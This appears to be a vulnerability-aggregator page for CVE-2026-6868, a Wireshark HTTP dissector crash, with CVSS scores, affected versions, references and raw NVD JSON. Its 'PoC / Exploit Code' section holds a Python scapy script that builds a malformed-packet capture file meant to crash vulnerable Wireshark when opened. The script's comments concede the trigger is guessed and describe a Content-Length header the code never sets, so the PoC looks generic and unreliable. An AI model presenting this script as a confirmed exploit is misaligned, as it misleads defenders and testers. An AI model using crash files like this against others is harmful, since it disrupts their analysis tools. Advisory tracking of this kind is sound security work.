Security Vulnerability Report
中文
CVE-2026-6868 CVSS 5.5 MEDIUM

CVE-2026-6868

Published: 2026-04-30 06:16:17
Last Modified: 2026-05-01 19:01:37

Description

HTTP protocol dissector crash in Wireshark 4.6.0 to 4.6.4 and 4.4.0 to 4.4.14 allows denial of service

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:* - VULNERABLE
Wireshark 4.6.0 至 4.6.4
Wireshark 4.4.0 至 4.4.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-6868 # This script generates a malformed HTTP packet that may crash Wireshark. # Run this script to generate 'crash.pcap', then open it in a vulnerable Wireshark version. from scapy.all import * # Create a malformed HTTP packet with an oversized header field # The specific trigger depends on the root cause, often large headers or invalid chunk sizes. # Here we simulate a large Content-Length header which might trigger an integer overflow or buffer issue. malformed_packet = IP(dst="127.0.0.1")/TCP(dport=80, sport=12345)/Raw( load=b"GET / HTTP/1.1\r\n" b"Host: example.com\r\n" b"X-Malicious-Header: " + b"A" * 10000 + b"\r\n" b"\r\n" ) # Save to pcap wrpcap("crash.pcap", malformed_packet) print("PoC file 'crash.pcap' generated. Open this file in Wireshark to test.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6868", "sourceIdentifier": "[email protected]", "published": "2026-04-30T06:16:16.783", "lastModified": "2026-05-01T19:01:36.567", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HTTP protocol dissector crash in Wireshark 4.6.0 to 4.6.4 and 4.4.0 to 4.4.14 allows denial of service"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndExcluding": "4.4.15", "matchCriteriaId": "8EAFFA8A-B5D8-4784-851E-E1B682871495"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.6.0", "versionEndExcluding": "4.6.5", "matchCriteriaId": "1D804272-AD4D-4454-9629-1BBAA825D7C4"}]}]}], "references": [{"url": "https://gitlab.com/wireshark/wireshark/-/work_items/21185", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://www.wireshark.org/security/wnpa-sec-2026-46.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}